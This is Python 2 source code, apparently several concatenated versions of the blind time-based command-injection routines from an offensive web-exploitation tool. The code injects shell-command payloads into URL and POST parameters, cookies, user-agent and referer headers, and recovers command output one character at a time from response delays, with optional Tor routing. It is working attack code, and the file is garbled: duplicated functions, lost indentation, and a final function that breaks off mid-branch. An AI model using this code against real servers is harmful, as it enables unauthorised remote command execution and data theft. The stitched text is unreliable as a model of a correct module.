def injection(separator,maxlen,TAG,cmd,delay,http_request_method,url,vuln_parameter,OUTPUT_TEXTFILE,alter_shell):
if menu.options.file_write or menu.options.file_upload :
minlen = 0
else:
minlen = 1
print "\n(*) Retrieving the length of execution output..."
for j in range(int(minlen),int(maxlen)):
# Execute shell commands on vulnerable host.
if not alter_shell :
payload = tfb_payloads.cmd_execution(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method)
else:
payload = tfb_payloads.cmd_execution_alter_shell(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + colors.GREY + payload.replace("\n","\\n") + colors.RESET)
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
payload = urllib.quote(payload)
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
#print target
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
response.read()
except urllib2.HTTPError, err:
print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
sys.exit(1)
else:
try:
response = urllib2.urlopen(request)
response.read()
except urllib2.HTTPError, err:
print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
sys.exit(1)
def false_positive_check(
separator,
TAG,
cmd,
prefix,
suffix,
delay,
http_request_method,
url,
vuln_parameter,
OUTPUT_TEXTFILE,
randvcalc,
alter_shell,
):
found_chars = False
if menu.options.verbose:
sys.stdout.write("\n(*) Testing the reliability of used payload... ")
sys.stdout.flush()
for output_length in range(1, 3):
# Execute shell commands on vulnerable host.
if alter_shell:
payload = tfb_payloads.cmd_execution_alter_shell(
separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method
)
else:
payload = tfb_payloads.cmd_execution(
separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method
)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
if menu.options.base64:
payload = base64.b64encode(payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
how_long = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
how_long = referer_injection_test(url, vuln_parameter, payload)
else:
how_long = examine_requests(payload, vuln_parameter, http_request_method, url)
if how_long >= delay:
found_chars = True
break
if found_chars == True:
num_of_chars = output_length + 1
check_start = 0
check_end = 0
check_start = time.time()
output = []
percent = 0
for num_of_chars in range(1, int(num_of_chars)):
for ascii_char in range(1, 3):
# Get the execution ouput, of shell execution.
if alter_shell:
payload = tfb_payloads.fp_result_alter_shell(
separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method
)
else:
payload = tfb_payloads.fp_result(separator, OUTPUT_TEXTFILE, ascii_char, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
if menu.options.base64:
payload = base64.b64encode(payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write(
"\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL
)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
how_long = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
how_long = referer_injection_test(url, vuln_parameter, payload)
else:
how_long = examine_requests(payload, vuln_parameter, http_request_method, url)
if how_long >= delay:
output.append(ascii_char)
break
check_end = time.time()
check_how_long = int(check_end - check_start)
output = "".join(str(p) for p in output)
if str(output) == str(randvcalc):
return output
def injection(
separator,
maxlen,
TAG,
cmd,
prefix,
suffix,
delay,
http_request_method,
url,
vuln_parameter,
OUTPUT_TEXTFILE,
alter_shell,
):
if menu.options.file_write or menu.options.file_upload:
minlen = 0
else:
minlen = 1
found_chars = False
sys.stdout.write("\n(*) Retrieving the length of execution output... ")
sys.stdout.flush()
for output_length in range(int(minlen), int(maxlen)):
# Execute shell commands on vulnerable host.
if alter_shell:
payload = tfb_payloads.cmd_execution_alter_shell(
separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method
)
else:
payload = tfb_payloads.cmd_execution(
separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method
)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
if menu.options.base64:
payload = base64.b64encode(payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
how_long = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
how_long = referer_injection_test(url, vuln_parameter, payload)
else:
how_long = examine_requests(payload, vuln_parameter, http_request_method, url)
if how_long >= delay:
if menu.options.verbose:
print "\n"
else:
sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n")
sys.stdout.flush()
print Style.BRIGHT + "(!) Retrieved " + str(output_length) + " characters." + Style.RESET_ALL
found_chars = True
break
if found_chars == True:
num_of_chars = output_length + 1
check_start = 0
check_end = 0
check_start = time.time()
output = []
percent = 0
sys.stdout.write(
"\r(*) Grabbing the output from '" + OUTPUT_TEXTFILE + "', please wait... [ " + str(percent) + "% ]"
)
sys.stdout.flush()
for num_of_chars in range(1, int(num_of_chars)):
for ascii_char in range(32, 129):
# Get the execution ouput, of shell execution.
if alter_shell:
payload = tfb_payloads.get_char_alter_shell(
separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method
)
else:
payload = tfb_payloads.get_char(
separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method
)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
if menu.options.base64:
payload = base64.b64encode(payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write(
"\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL
)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
how_long = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
how_long = referer_injection_test(url, vuln_parameter, payload)
else:
how_long = examine_requests(payload, vuln_parameter, http_request_method, url)
if how_long >= delay:
if not menu.options.verbose:
output.append(chr(ascii_char))
percent = (num_of_chars * 100) / output_length
float_percent = "{0:.1f}".format(round(((num_of_chars * 100) / (output_length * 1.0)), 2))
sys.stdout.write(
"\r(*) Grabbing the output from '"
+ OUTPUT_TEXTFILE
+ "', please wait... [ "
+ str(float_percent)
+ "% ]"
)
sys.stdout.flush()
else:
output.append(chr(ascii_char))
break
check_end = time.time()
check_how_long = int(check_end - check_start)
output = "".join(str(p) for p in output)
else:
check_start = 0
sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]\n")
sys.stdout.flush()
check_how_long = 0
output = ""
return check_how_long, output
def injection(separator, maxlen, TAG, cmd, delay, http_request_method, url,
vuln_parameter, OUTPUT_TEXTFILE, alter_shell):
if menu.options.file_write or menu.options.file_upload:
minlen = 0
else:
minlen = 1
found_chars = False
sys.stdout.write("\n(*) Retrieving the length of execution output... ")
sys.stdout.flush()
for output_length in range(int(minlen), int(maxlen)):
# Execute shell commands on vulnerable host.
if not alter_shell:
payload = tfb_payloads.cmd_execution(separator, cmd, output_length,
OUTPUT_TEXTFILE, delay,
http_request_method)
else:
payload = tfb_payloads.cmd_execution_alter_shell(
separator, cmd, output_length, OUTPUT_TEXTFILE, delay,
http_request_method)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") +
Style.RESET_ALL)
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
else:
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
payload = urllib.quote(payload)
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
#print target
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error : " + str(
err) + Style.RESET_ALL
raise SystemExit()
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error : " + str(
err) + Style.RESET_ALL
raise SystemExit()
else:
try:
response = urllib2.urlopen(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error : " + str(
err) + Style.RESET_ALL
raise SystemExit()
def injection(separator, maxlen, TAG, cmd, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell):
if menu.options.file_write or menu.options.file_upload :
minlen = 0
else:
minlen = 1
found_chars = False
sys.stdout.write("\n(*) Retrieving the length of execution output... ")
sys.stdout.flush()
for output_length in range(int(minlen), int(maxlen)):
# Execute shell commands on vulnerable host.
if not alter_shell :
payload = tfb_payloads.cmd_execution(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method)
else:
payload = tfb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
else:
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
payload = urllib.quote(payload)
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
#print target
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL
raise SystemExit()
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL
raise SystemExit()
else:
try:
response = urllib2.urlopen(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL
raise SystemExit()
def false_positive_check(separator, TAG, cmd, prefix, suffix, delay,
http_request_method, url, vuln_parameter,
OUTPUT_TEXTFILE, randvcalc, alter_shell):
found_chars = False
if menu.options.verbose:
sys.stdout.write("\n(*) Testing the reliability of used payload... ")
sys.stdout.flush()
for output_length in range(1, 3):
# Execute shell commands on vulnerable host.
if alter_shell:
payload = tfb_payloads.cmd_execution_alter_shell(
separator, cmd, output_length, OUTPUT_TEXTFILE, delay,
http_request_method)
else:
payload = tfb_payloads.cmd_execution(separator, cmd, output_length,
OUTPUT_TEXTFILE, delay,
http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
if menu.options.base64:
payload = base64.b64encode(payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
payload.replace("\n", "\\n") + Style.RESET_ALL)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
how_long = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
how_long = referer_injection_test(url, vuln_parameter, payload)
else:
how_long = examine_requests(payload, vuln_parameter,
http_request_method, url)
if how_long >= delay:
found_chars = True
break
if found_chars == True:
num_of_chars = output_length + 1
check_start = 0
check_end = 0
check_start = time.time()
output = []
percent = 0
for num_of_chars in range(1, int(num_of_chars)):
for ascii_char in range(1, 3):
# Get the execution ouput, of shell execution.
if alter_shell:
payload = tfb_payloads.fp_result_alter_shell(
separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char,
delay, http_request_method)
else:
payload = tfb_payloads.fp_result(separator,
OUTPUT_TEXTFILE,
ascii_char, delay,
http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
if menu.options.base64:
payload = base64.b64encode(payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
payload.replace("\n", "\\n") +
Style.RESET_ALL)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter,
payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
how_long = user_agent_injection_test(
url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
how_long = referer_injection_test(url, vuln_parameter,
payload)
else:
how_long = examine_requests(payload, vuln_parameter,
http_request_method, url)
if how_long >= delay:
output.append(ascii_char)
break
check_end = time.time()
check_how_long = int(check_end - check_start)
output = "".join(str(p) for p in output)
if str(output) == str(randvcalc):
return output
def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay,
http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE,
alter_shell, filename):
if menu.options.file_write or menu.options.file_upload:
minlen = 0
else:
minlen = 1
found_chars = False
sys.stdout.write("(*) Retrieving the length of execution output... ")
sys.stdout.flush()
for output_length in range(int(minlen), int(maxlen)):
# Execute shell commands on vulnerable host.
if alter_shell:
payload = tfb_payloads.cmd_execution_alter_shell(
separator, cmd, output_length, OUTPUT_TEXTFILE, delay,
http_request_method)
else:
payload = tfb_payloads.cmd_execution(separator, cmd, output_length,
OUTPUT_TEXTFILE, delay,
http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
if menu.options.base64:
payload = base64.b64encode(payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
payload.replace("\n", "\\n") + Style.RESET_ALL)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
how_long = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
how_long = referer_injection_test(url, vuln_parameter, payload)
else:
how_long = examine_requests(payload, vuln_parameter,
http_request_method, url)
if how_long >= delay:
if output_length > 1:
if menu.options.verbose:
print "\n"
else:
sys.stdout.write("[" + Fore.GREEN + " SUCCEED " +
Style.RESET_ALL + "]\n")
sys.stdout.flush()
print Style.BRIGHT + "(!) Retrieved " + str(
output_length) + " characters." + Style.RESET_ALL
found_chars = True
break
if found_chars == True:
num_of_chars = output_length + 1
check_start = 0
check_end = 0
check_start = time.time()
output = []
percent = 0
sys.stdout.write("\r(*) Grabbing the output from '" + OUTPUT_TEXTFILE +
"', please wait... [ " + str(percent) + "% ]")
sys.stdout.flush()
for num_of_chars in range(1, int(num_of_chars)):
for ascii_char in range(32, 129):
# Get the execution ouput, of shell execution.
if alter_shell:
payload = tfb_payloads.get_char_alter_shell(
separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char,
delay, http_request_method)
else:
payload = tfb_payloads.get_char(separator, OUTPUT_TEXTFILE,
num_of_chars, ascii_char,
delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
if menu.options.base64:
payload = base64.b64encode(payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
payload.replace("\n", "\\n") +
Style.RESET_ALL)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter,
payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
how_long = user_agent_injection_test(
url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
how_long = referer_injection_test(url, vuln_parameter,
payload)
else:
how_long = examine_requests(payload, vuln_parameter,
http_request_method, url)
if how_long >= delay:
if not menu.options.verbose:
output.append(chr(ascii_char))
percent = ((num_of_chars * 100) / output_length)
float_percent = "{0:.1f}".format(
round(
((num_of_chars * 100) / (output_length * 1.0)),
2))
sys.stdout.write("\r(*) Grabbing the output from '" +
OUTPUT_TEXTFILE +
"', please wait... [ " +
str(float_percent) + "% ]")
sys.stdout.flush()
else:
output.append(chr(ascii_char))
break
check_end = time.time()
check_how_long = int(check_end - check_start)
output = "".join(str(p) for p in output)
else:
check_start = 0
if not menu.options.verbose:
sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL +
"]\n")
sys.stdout.flush()
else:
print ""
check_how_long = 0
output = ""
return check_how_long, output
def injection(separator,maxlen,TAG,cmd,delay,http_request_method,url,vuln_parameter,OUTPUT_TEXTFILE,alter_shell):
print "\n(*) Retrieving the length of execution output..."
for j in range(1,int(maxlen)):
# Execute shell commands on vulnerable host.
if not alter_shell :
payload = tfb_payloads.cmd_execution(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method)
else:
payload = tfb_payloads.cmd_execution_alter_shell(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
payload = urllib.quote(payload)
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
#print target
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
response.read()
except urllib2.HTTPError, err:
print "\n(x) Error : " + str(err)
sys.exit(1)
else:
response = urllib2.urlopen(request)
response.read()
# Check if defined method is POST.
else :
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
response.read()
except urllib2.HTTPError, err:
print "\n(x) Error : " + str(err)
sys.exit(1)
else: